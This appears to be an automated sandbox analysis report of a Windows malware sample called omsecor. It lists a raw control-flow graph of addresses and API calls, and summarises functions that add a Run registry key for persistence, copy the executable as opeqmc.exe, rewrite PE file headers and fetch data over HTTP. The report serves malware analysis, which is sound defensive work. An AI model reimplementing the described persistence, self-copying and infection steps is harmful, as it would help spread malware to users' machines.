401d15 6910->6915 6911 401d0e 6912 407267 3 API calls 6911->6912 6912->6915 6913->6915 6914->6910 6914->6911 6915->6907 6277 402dd5 6280 40267a 6277->6280 6286 40268a 6280->6286 6281 4027dd 6282 4026ee GetTickCount 6282->6286 6285 407552 Sleep 6285->6286 6286->6281 6286->6282 6286->6285 6287 4027e6 OleInitialize 6286->6287 6348 40a8f9 6286->6348 6365 40a469 6287->6365 6289 402806 6297 40280b 6289->6297 6372 40a345 6289->6372 6292 402851 6378 40a65e 6292->6378 6293 40285f 6295 40286e 6293->6295 6381 4072ed GetSystemTime SystemTimeToFileTime SystemTimeToFileTime 6293->6381 6383 409f2b 6295->6383 6297->6286 6299 402884 6300 4028b4 6299->6300 6305 402943 6299->6305 6391 408f26 6299->6391 6303 408f26 10 API calls 6300->6303 6300->6305 6302 402c20 6304 40a65e Sleep 6302->6304 6306 4028ea 6303->6306 6304->6297 6305->6302 6312 4029aa 6305->6312 6416 4089fd 6305->6416 6308 4028f1 6306->6308 6309 402956 6306->6309 6307 4029e6 6310 402a3b 6307->6310 6425 40920a 6307->6425 6315 402904 SysAllocString 6308->6315 6313 40a65e Sleep 6309->6313 6316 402a6f 6310->6316 6321 408f26 10 API calls 6310->6321 6312->6307 6317 4089fd 5 API calls 6312->6317 6313->6305 6319 402927 SysFreeString 6315->6319 6320 40293a 6315->6320 6322 402aa2 6316->6322 6326 408f26 10 API calls 6316->6326 6317->6307 6318 402a17 6430 409c49 6318->6430 6319->6319 6319->6320 6320->6305 6410 4091bd 6320->6410 6325 402a62 SysAllocString 6321->6325 6323 402ad1 6322->6323 6327 408f26 10 API calls 6322->6327 6328 402b04 6323->6328 6333 408f26 10 API calls 6323->6333 6325->6316 6331 402a95 SysAllocString 6326->6331 6332 402ac4 SysAllocString 6327->6332 6334 40a65e Sleep 6328->6334 6331->6322 6332->6323 6335 402af7 SysAllocString 6333->6335 6336 402b0e 6334->6336 6335->6328 6337 409c49 SysAllocString 6336->6337 6338 402b6b 6336->6338 6337->6338 6339 409c49 SysAllocString 6338->6339 6340 402b83 6338->6340 6339->6340 6341 402be3 6340->6341 6342 402bea 6340->6342 6433 408825 6341->6433 6457 408692 6342->6457 6345 402be8 SysFreeString 6345->6302 6347 402c11 SysFreeString 6345->6347 6347->6302 6347->6347 6349 40a906 6348->6349 6350 406d14 2 API calls 6349->6350 6351 40a917 Sleep 6349->6351 6352 40a92c 6349->6352 6350->6349 6351->6349 6353 4078cb 12 API calls 6352->6353 6354 40aa37 6353->6354 6355 406cb5 GetVersionExW 6354->6355 6356 40aa52 6355->6356 6357 40a718 5 API calls 6356->6357 6358 40aa7e 6357->6358 6359 40a744 5 API calls 6358->6359 6361 40aa91 6359->6361 6360 406e69 22 API calls 6360->6361 6361->6360 6362 40aabc Sleep 6361->6362 6363 40aae5 GetProcessHeap HeapFree 6361->6363 6364 40a744 5 API calls 6361->6364 6362->6361 6363->6286 6364->6361 6366 40a479 6365->6366 6369 40a4dc 6366->6369 6371 40a4ef 6366->6371 6473 40a156 6366->6473 6368 40a530 InternetOpenW 6370 40a545 InternetSetOptionW 6368->6370 6368->6371 6369->6368 6369->6371 6370->6371 6371->6289 6375 40a352 6372->6375 6373 40a442 6377 40284a 6373->6377 6498 40a2d9 6373->6498 6375->6373 6375->6377 6490 40a245 6375->6490 6377->6292 6377->6293 6380 40a662 Sleep 6378->6380 6380->6297 6382 40735e __aulldiv 6381->6382 6382->6295 6384 409f37 6383->6384 6385 409f40 GetTickCount 6384->6385 6386 409f5f GetTickCount 6385->6386 6387 409fa7 6386->6387 6388 409f67 PeekMessageW 6386->6388 6387->6299 6389 409f88 Sleep 6388->6389 6390 409f7c DispatchMessageW 6388->6390 6389->6386 6390->6388 6514 40a582 6391->6514 6393 408f35 6394 408f3e 6393->6394 6395 408f78 SysFreeString 6393->6395 6401 408f96 6393->6401 6394->6300 6395->6395 6395->6401 6396 409039 6397 409040 6396->6397 6398 409043 SysFreeString 6396->6398 6399 409058 6396->6399 6397->6398 6398->6394 6400 409091 GetTickCount 6399->6400 6407 40905f 6399->6407 6409 4090ae 6400->6409 6401->6396 6404 409025 SysFreeString 6401->6404 6402 40908f 6405 409108 SysFreeString 6402->6405 6406 40911b SysFreeString 6402->6406 6403 40906a SysAllocString 6403->6407 6404->6401 6405->6405 6405->6406 6406->6394 6407->6402 6407->6403 6408 4090c7 SysAllocString 6408->6409 6409->6402 6409->6408 6411 40a582 2 API calls 6410->6411 6412 4091cc 6411->6412 6413 4091d2 6412->6413 6522 409655 6412->6522 6413->6305 6424 408a1a 6416->6424 6417 408bc4 6418 408c1c GetTickCount 6417->6418 6420 408a1e 6417->6420 6418->6420 6419 408c0d VariantClear 6419->6420 6420->6312 6421 408b99 SysFreeString 6421->6424 6422 408bab VariantClear 6422->6417 6422->6424 6423 408b6b SysFreeString 6423->6424 6424->6417 6424->6419 6424->6420 6424->6421 6424->6422 6424->6423 6429 409217 6425->6429 6427 409295 SysAllocString 6427->6318 6429->6427 6526 408091 6429->6526 6431 409c54 SysAllocString 6430->6431 6432 402a27 SysAllocString SysFreeString 6430->6432 6431->6432 6432->6310 6434 408832 6433->6434 6435 40a469 14 API calls 6434->6435 6437 408857 6435->6437 6436 40885c 6436->6345 6437->6436 6438 40a345 22 API calls 6437->6438 6446 408883 6438->6446 6439 40888a 6442 40a65e Sleep 6439->6442 6440 4088eb 6441 409f2b 5 API calls 6440->6441 6443 4088f6 6441->6443 6442->6436 6444 4089fd 5 API calls 6443->6444 6445 408911 6444->6445 6445->6439 6454 40891f 6445->6454 6446->6439 6446->6440 6534 409301 6446->6534 6449 4089f0 SysFreeString 6450 40a65e Sleep 6450->6454 6451 40a469 14 API calls 6451->6454 6452 40a345 22 API calls 6452->6454 6453 409f2b 5 API calls 6453->6454 6454->6449 6454->6450 6454->6451 6454->6452 6454->6453 6455 409301 7 API calls 6454->6455 6456 4089cd SysFreeString SysFreeString 6455->6456 6456->6454 6458 40a469 14 API calls 6457->6458 6460 4086b1 6458->6460 6459 4086b6 6459->6345 6460->6459 6461 40a345 22 API calls 6460->6461 6462 4086de 6461->6462 6463 4086e5 6462->6463 6464 4086f8 6462->6464 6465 40a65e Sleep 6463->6465 6466 409f2b 5 API calls 6464->6466 6465->6459 6468 408703 6466->6468 6467 40874a CharLowerW SysFreeString 6472 40876c 6467->6472 6468->6467 6469 408811 6471 409f2b 5 API calls 6471->6472 6472->6469 6472->6471 6545 408cb7 6472->6545 6474 40a16f 6473->6474 6475 40a16a 6473->6475 6479 40a188 SysAllocString 6474->6479 6488 40a057 GetForegroundWindow CoCreateInstance SetForegroundWindow 6474->6488 6485 40a0b5 CoInitialize 6475->6485 6481 40a1b8 6479->6481 6480 40a224 6480->6369 6481->6480 6482 40a1ce FindWindowW 6481->6482 6483 40a1e8 GetWindowLongW SetWindowLongW SetWindowPos 6482->6483 6484 40a1de SetParent 6482->6484 6483->6480 6484->6483 6486 40a0cc GetModuleHandleW CreateWindowExW 6485->6486 6487 40a0fd 6486->6487 6487->6474 6489 40a093 6488->6489 6489->6479 6489->6480 6491 40a262 _memset 6490->6491 6492 40a2d6 6490->6492 6493 40a270 SysAllocString SysAllocString 6491->6493 6492->6373 6494 40a2b3 6493->6494 6495 40a2c3 SysFreeString SysFreeString 6494->6495 6504 409fb1 6494->6504 6495->6492 6497 40a2c2 6497->6495 6499 40a2f4 6498->6499 6503 40a2f0 6498->6503 6500 40a313 6499->6500 6501 40a2fe GetProcessHeap HeapFree 6499->6501 6502 409c99 11 API calls 6500->6502 6501->6500 6502->6503 6503->6377 6513 40d258 6504->6513 6506 409fbd GetTickCount 6507 409fd3 6506->6507 6508 409fde GetTickCount 6507->6508 6509 40a030 6507->6509 6508->6509 6510 409fea Sleep 6508->6510 6509->6497 6511 409ff2 PeekMessageW 6510->6511 6511->6507 6512 40a005 DispatchMessageW 6511->6512 6512->6511 6513->6506 6515 40a5a0 6514->6515 6516 40a5a4 6514->6516 6515->6393 6517 40a63f 6516->6517 6520 40a5ae 6516->6520 6518 40a63b 6517->6518 6519 40a64e SysAllocString 6517->6519 6518->6393 6519->6518 6520->6518 6521 40a632 SysFreeString 6520->6521 6521->6518 6524 40966d 6522->6524 6523 4091eb SysFreeString 6523->6413 6524->6523 6525 40c5d0 __VEC_memcpy 6524->6525 6525->6523 6528 40809e __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 6526->6528 6527 408212 6527->6429 6528->6527 6530 407f4f 6528->6530 6532 407f5c 6530->6532 6531 407f71 6531->6528 6532->6531 6533 4072ed 3 API calls 6532->6533 6533->6531 6535 409314 6534->6535 6536 4088de SysFreeString SysFreeString 6535->6536 6537 40933b CharLowerW 6535->6537 6541 409364 6535->6541 6536->6440 6538 409351 6537->6538 6539 409362 SysFreeString 6538->6539 6540 409359 SysFreeString 6538->6540 6539->6541 6540->6536 6541->6536 6542 4093ae SysAllocString SysAllocString 6541->6542 6543 4093d7 SysFreeString SysFreeString 6542->6543 6543->6536 6547 408cd2 6545->6547 6546 408cd6 6546->6472 6547->6546 6548 408f17 VariantClear 6547->6548 6549 408e8f 6547->6549 6551 408e6d SysFreeString 6547->6551 6552 408e76 VariantClear 6547->6552 6553 408e2c SysFreeString 6547->6553 6555 409581 6547->6555 6548->6546 6549->6546 6550 408ed5 SysAllocString 6549->6550 6550->6546 6551->6552 6552->6547 6552->6549 6553->6547 6556 409591 6555->6556 6557 409595 6556->6557 6558 409599 CharLowerW 6556->6558 6557->6547 6559 4095fb 6558->6559 6561 4095b3 6558->6561 6560 40960a SysFreeString 6559->6560 6560->6547 6561->6559 6561->6560 6562 4095d5 CharLowerW 6561->6562 6563 4095df 6562->6563 6564 409605 SysFreeString 6563->6564 6564->6560 6916 403e18 6917 40821c PathCombineW 6916->6917 6918 403e3d 6917->6918 6919 403e4c 6918->6919 6920 403e8f 6918->6920 6926 403e87 6918->6926 6922 408248 8 API calls 6919->6922 6921 40c519 4 API calls 6920->6921 6925 403e9c 6921->6925 6922->6926 6923 40c5b9 SysFreeString 6923->6925 6924 40c43d 4 API calls 6924->6925 6925->6923 6925->6924 6925->6926 6927 40be3a HeapFree 6925->6927 6928 40c00b 3 API calls 6925->6928 6927->6925 6928->6925 6929 409a99 6930 409aa6 6929->6930 6931 409723 __VEC_memcpy 6930->6931 6932 409ac4 6931->6932 6933 409b18 6932->6933 6934 409723 __VEC_memcpy 6932->6934 6935 409ae9 6934->6935 6935->6933 6936 409af2 SysAllocString SysAllocString 6935->6936 6936->6933 6937 409f99 Sleep 6938 409fa7 6937->6938 6565 402c62 6574 406c77 RegOpenKeyExW 6565->6574 6567 402c77 6568 406cb5 GetVersionExW 6567->6568 6569 402c7c 6568->6569 6570 40a8f9 34 API calls 6569->6570 6571 402c8f 6570->6571 6572 40267a 122 API calls 6571->6572 6573 402ca8 6572->6573 6575 406c9b 6574->6575 6576 406c9f 6574->6576 6575->6567 6579 4069c0 RegQueryValueExW RegCloseKey 6576->6579 6578 406cb0 6578->6567 6579->6578 6939 40d2a4 6940 40d2ac 6939->6940 6941 40d378 __except_handler3 6940->6941 6945 40d790 6940->6945 6944 40d2e5 __except_handler3 __except_handler4 _CallDestructExceptionObject 6944->6941 6951 40d110 RtlUnwind 6944->6951 6948 40d7e5 _ValidateScopeTableHandlers __except_handler3 __FindPESection 6945->6948 6950 40d7d1 _ValidateScopeTableHandlers __except_handler3 __FindPESection 6945->6950 6946 40d99d VirtualQuery 6947 40d9b2 6946->6947 6946->6950 6949 40d9cc GetVersionExA 6947->6949 6947->6950 6948->6946 6948->6950 6949->6950 6950->6944 6952 40d128 6951->6952 6952->6944 6580 4053ea HeapCreate 6581 405408 GetProcessHeap 6580->6581 6582 40541c 6580->6582 6581->6582 6599 403740 6582->6599 6600 40375a 6599->6600 6716 40848f RegOpenKeyExW 6600->6716 6603 4037c3 6611 4037f6 SHGetFolderPathW 6603->6611 6612 408248 8 API calls 6603->6612 6613 403837 6603->6613 6604 4037a2 ExpandEnvironmentStringsW 6726 4034a8 6604->6726 6606 403846 6608 40be3a HeapFree 6606->6608 6607 40383c 6730 4033a0 6607->6730 6610 403844 6608->6610 6614 403c10 6610->6614 6611->6603 6612->6603 6613->6606 6613->6607 6615 403c29 6614->6615 6616 40848f 7 API calls 6615->6616 6617 403c6d 6616->6617 6618 403c79 ExpandEnvironmentStringsW 6617->6618 6629 403ca9 6617->6629 6744 4039ea HeapAlloc 6618->6744 6620 403e00 6623 4033a0 HeapFree 6620->6623 6621 403e0a 6624 40be3a HeapFree 6621->6624 6625 403e08 6623->6625 6624->6625 6636 4040e7 6625->6636 6626 403d18 SHGetFolderPathW 6626->6629 6628 408248 8 API calls 6628->6629 6629->6626 6629->6628 6630 403d88 6629->6630 6633 403df7 6629->6633 6761 4039a3 6629->6761 6631 40848f 7 API calls 6630->6631 6630->6633 6632 403dc8 6631->6632 6632->6633 6634 403dd4 ExpandEnvironmentStringsW 6632->6634 6633->6620 6633->6621 6635 4039a3 8 API calls 6634->6635 6635->6633 6640 404100 6636->6640 6637 40412c SHGetFolderPathW 6637->6640 6638 408248 8 API calls 6638->6640 6639 40416d 6641 404172 6639->6641 6642 40417c 6639->6642 6640->6637 6640->6638 6640->6639 6643 4033a0 HeapFree 6641->6643 6644 40be3a HeapFree 6642->6644 6645 40417a 6643->6645 6644->6645 6646 4041e4 HeapAlloc 6645->6646 6651 404212 6646->6651 6658 404453 6646->6658 6647 4042a0 RegOpenKeyExW 6647->6651 6648 40440f RegEnumKeyExW 6650 404427 RegCloseKey 6648->6650 6648->6651 6649 40443d 6652 40be3a HeapFree 6649->6652 6650->6651 6651->6647 6651->6648 6651->6649 6659 40848f 7 API calls 6651->6659 6660 40435e RegOpenKeyExW 6651->6660 6661 40845d 2 API calls 6651->6661 6662 40c3f9 wvnsprintfW 6651->6662 6663 40c00b 3 API calls 6651->6663 6653 404445 6652->6653 6654 404455 6653->6654 6655 40444b 6653->6655 6657 40be3a HeapFree 6654->6657 6656 4033a0 HeapFree 6655->6656 6656->6658 6657->6658 6664 40451b 6658->6664 6659->6651 6660->6651 6661->6651 6662->6651 6663->6651 6765 40be9d 6664->6765 6666 404535 HeapAlloc 6667 404786 6666->6667 6681 404555 6666->6681 6668 404796 6667->6668 6669 40478c 6667->6669 6671 40be3a HeapFree 6668->6671 6670 4033a0 HeapFree 6669->6670 6672 404794 6670->6672 6671->6672 6684 404a92 6672->6684 6673 4045c5 RegOpenKeyExW 6674 4045e8 RegEnumKeyExW 6673->6674 6673->6681 6674->6681 6675 404780 6676 40be3a HeapFree 6675->6676 6676->6667 6677 40476a RegCloseKey 6677->6681 6678 40848f 7 API calls 6678->6681 6679 40473d RegEnumKeyExW 6679->6681 6681->6673 6681->6675 6681->6677 6681->6678 6681->6679 6682 40c3f9 wvnsprintfW 6681->6682 6683 40c00b 3 API calls 6681->6683 6766 40854c RegOpenKeyExW 6681->6766 6682->6681 6683->6681 6685 404aab 6684->6685 6686 404ad7 SHGetFolderPathW 6685->6686 6687 408248 8 API calls 6685->6687 6688 404b18 6685->6688 6686->6685 6687->6685 6689 404b27 6688->6689 6690 404b1d 6688->6690 6691 40be3a HeapFree 6689->6691 6692 4033a0 HeapFree 6690->6692 6693 404b25 6691->6693 6692->6693 6694 405136 6693->6694 6695 405150 6694->6695 6696 40848f 7 API calls 6695->6696 6697 4051e0 ExpandEnvironmentStringsW 6695->6697 6698 40520b 6695->6698 6696->6695 6699 404e7b 8 API calls 6697->6699 6700 405211 6698->6700 6701 40521b 6698->6701 6699->6695 6703 4033a0 HeapFree 6700->6703 6702 40be3a HeapFree 6701->6702 6704 405219 6702->6704 6703->6704 6705 405229 6704->6705 6706 405238 6705->6706 6707 407b4e 9 API calls 6706->6707 6708 4052e8 6707->6708 6709 406d14 2 API calls 6708->6709 6712 405361 Sleep 6708->6712 6715 405372 6708->6715 6709->6708 6710 40537c Sleep 6710->6715 6712->6708 6713 4053cb Sleep 6713->6715 6714 4053e0 6715->6710 6715->6713 6715->6714 6770 409df4 6715->6770 6717 4084af 6716->6717 6720 4084c5 6716->6720 6734 40845d RegQueryValueExW 6717->6734 6719 403796 6719->6603 6719->6604 6720->6719 6737 40bfd0 6720->6737 6722 408518 6723 40852e 6722->6723 6724 40851f ExpandEnvironmentStringsW 6722->6724 6725 408531 GetProcessHeap HeapFree 6723->6725 6724->6723 6724->6725 6725->6719 6727 4034bc 6726->6727 6728 408248 8 API calls 6727->6728 6729 40350a 6728->6729 6729->6603 6732 4033a4 6730->6732 6731 40be3a HeapFree 6733 4033d7 6731->6733 6732->6731 6733->6610 6735 408482 RegCloseKey 6734->6735 6736 40847f 6734->6736 6735->6720 6736->6735 6738 40bfd7 6737->6738 6739 40bfda 6737->6739 6738->6722 6740 40bff3 6739->6740 6743 40be27 HeapAlloc 6739->6743 6740->6722 6742 40bffa 6742->6722 6743->6742 6745 403bb9 PathRemoveFileSpecW 6744->6745 6746 403a1a GetPrivateProfileStringW 6744->6746 6745->6629 6747 403a36 6746->6747 6758 403baf 6746->6758 6749 403a48 HeapAlloc 6747->6749 6747->6758 6748 40be3a HeapFree 6748->6745 6750 403a64 6749->6750 6749->6758 6751 403ac8 StrStrIW 6750->6751 6756 403ba9 6750->6756 6759 40c3f9 wvnsprintfW 6750->6759 6760 40c00b 3 API calls 6750->6760 6751->6750 6752 403add StrStrIW 6751->6752 6752->6750 6753 403af2 GetPrivateProfileStringW 6752->6753 6753->6750 6754 403b09 GetPrivateProfileStringW 6753->6754 6754->6750 6755 403b26 GetPrivateProfileStringW 6754->6755 6755->6750 6757 40be3a HeapFree 6756->6757 6757->6758 6758->6748 6759->6750 6760->6750 6762 4039b7 6761->6762 6763 408248 8 API calls 6762->6763 6764 4039e5 6763->6764 6764->6629 6765->6666 6767 40856f 6766->6767 6769 408585 6766->6769 6768 40845d 2 API calls 6767->6768 6768->6769 6769->6681 6771 409e01 6770->6771 6783 40beea 6771->6783 6774 409eb1 HttpOpenRequestW 6775 409ead 6774->6775 6777 409ecf HttpSendRequestW 6774->6777 6775->6715 6778 40be3a HeapFree 6777->6778 6779 409eea 6778->6779 6779->6775 6780 409eef InternetReadFile 6779->6780 6780->6775 6781 409f0c 6780->6781 6791 40bf35 6781->6791 6784 40bef4 6783->6784 6795 40beb4 6784->6795 6787 409e3e InternetConnectW 6787->6774 6787->6775 6789 40bf1c 6789->6787 6790 40beb4 WideCharToMultiByte 6789->6790 6790->6787 6792 40bf3a 6791->6792 6793 40bf3f MultiByteToWideChar 6791->6793 6792->6793 6794 40bf58 6793->6794 6794->6775 6796 40bec3 WideCharToMultiByte 6795->6796 6797 40bebe 6795->6797 6798 40bedd 6796->6798 6797->6796 6798->6787 6799 40be27 HeapAlloc 6798->6799 6799->6789 6959 40d2ac 6960 40d2ca 6959->6960 6963 40d378 __except_handler3 6959->6963 6961 40d790 __except_handler3 2 API calls 6960->6961 6962 40d2e5 __except_handler3 __except_handler4 _CallDestructExceptionObject 6961->6962 6962->6963 6964 40d110 __except_handler3 RtlUnwind 6962->6964 6964->6962 6965 402cad 6966 406c77 3 API calls 6965->6966 6967 402cc3 6966->6967 6968 406cb5 GetVersionExW 6967->6968 6969 402cc8 6968->6969 6970 40a8f9 34 API calls 6969->6970 6971 402cdb 6970->6971 6972 40267a 122 API calls 6971->6972 6973 402d00 6972->6973 6974 409c6f SysFreeString 6973->6974 6975 402d08 6974->6975 6976 4032af ExitProcess 6981 402c32 6982 40267a 122 API calls 6981->6982 6983 402c56 6982->6983 6984 409c6f SysFreeString 6983->6984 6985 402c5e 6984->6985 6800 402df3 6801 406c77 3 API calls 6800->6801 6802 402e08 6801->6802 6803 406cb5 GetVersionExW 6802->6803 6804 402e0d 6803->6804 6805 40a8f9 34 API calls 6804->6805 6806 402e20 6805->6806 6807 40267a 122 API calls 6806->6807 6808 402e39 6807->6808 6986 4094b6 6987 4094c9 6986->6987 6988 4094cd 6987->6988 6989 4094f3 CharLowerW CharLowerW 6987->6989 6990 4094e3 SysFreeString 6987->6990 6992 409560 6989->6992 6993 409512 6989->6993 6991 40957e 6990->6991 6994 40956f SysFreeString SysFreeString 6992->6994 6993->6992 6993->6994 6995 40953a CharLowerW 6993->6995 6994->6991 6996 409544 6995->6996 6997 40956a SysFreeString 6996->6997 6997->6994 7003 402db7 7004 40267a 122 API calls 7003->7004 7005 402dd1 7004->7005 7006 40183a 7007 401854 7006->7007 7008 408091 3 API calls 7007->7008 7011 401958 7007->7011 7009 40194a 7008->7009 7010 408091 3 API calls 7009->7010 7010->7011 7012 4097bc 7013 409655 __VEC_memcpy 7012->7013 7014 4097d6 7013->7014 7015 409805 7014->7015 7016 4097df SysAllocString SysAllocString 7014->7016 7016->7015 7019 402e3e 7030 402e4d 7019->7030 7020 40327c 7021 402eb7 GetModuleFileNameW 7022 402ed6 GetCurrentDirectoryW 7021->7022 7021->7030 7022->7030 7023 402f2a GetLastError 7024 40a786 35 API calls 7023->7024 7024->7030 7025 40253c 50 API calls 7025->7030 7026 403251 GetLastError 7026->7030 7027 403237 GetLastError 7027->7030 7028 40a786 35 API calls 7028->7030 7029 407552 Sleep 7029->7030 7030->7020 7030->7021 7030->7023 7030->7025 7030->7026 7030->7027 7030->7028 7030->7029 7042 403bbf 7043 40821c PathCombineW 7042->7043 7044 403bdf 7043->7044 7045 403bf9 7044->7045 7046 403bfe 7044->7046 7047 403bee 7044->7047 7049 4039ea 12 API calls 7046->7049 7048 4039a3 8 API calls 7047->7048 7048->7045 7049->7045

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 305 40abd9-40abf5 call 40ac20 308 40abf7-40ac0c FindFirstFileW 305->308 309 40ac1a 305->309 308->309 310 40ac0e-40ac18 FindClose 308->310 311 40ac1c-40ac1f 309->311 310->311
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,74DF0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                                                                                                                                                                                                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040AC0F
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FindOpen$CloseFileFirst
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3155378417-0
                                                                                                                                                                                                  • Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                                                                                                                                                                                                  • Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D
                                                                                                                                                                                                    • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000004), ref: 0040B3CA
                                                                                                                                                                                                  • Sleep.KERNEL32(00002710), ref: 0040B3F7
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
                                                                                                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040B44D
                                                                                                                                                                                                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,74DF0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                                                                                                                                                                                                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000004), ref: 0040B48D
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000004), ref: 0040B49A
                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000004), ref: 0040B500
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
                                                                                                                                                                                                  • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
                                                                                                                                                                                                  • API String ID: 3692109554-477663111
                                                                                                                                                                                                  • Opcode ID: a37a2c0829b51652c0125789b7ef107c293a8625708184dc08050438480bf6fc
                                                                                                                                                                                                  • Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a37a2c0829b51652c0125789b7ef107c293a8625708184dc08050438480bf6fc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                                                                                                                                                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0040762E
                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040763F
                                                                                                                                                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00407660
                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040767F
                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00407691
                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000040,?,00000000), ref: 004076A1
                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004076AF
                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,000000F8,?,00000000), ref: 004076C5
                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004076EF
                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,000000F8,?,00000000), ref: 00407705
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00407714
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00407719
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
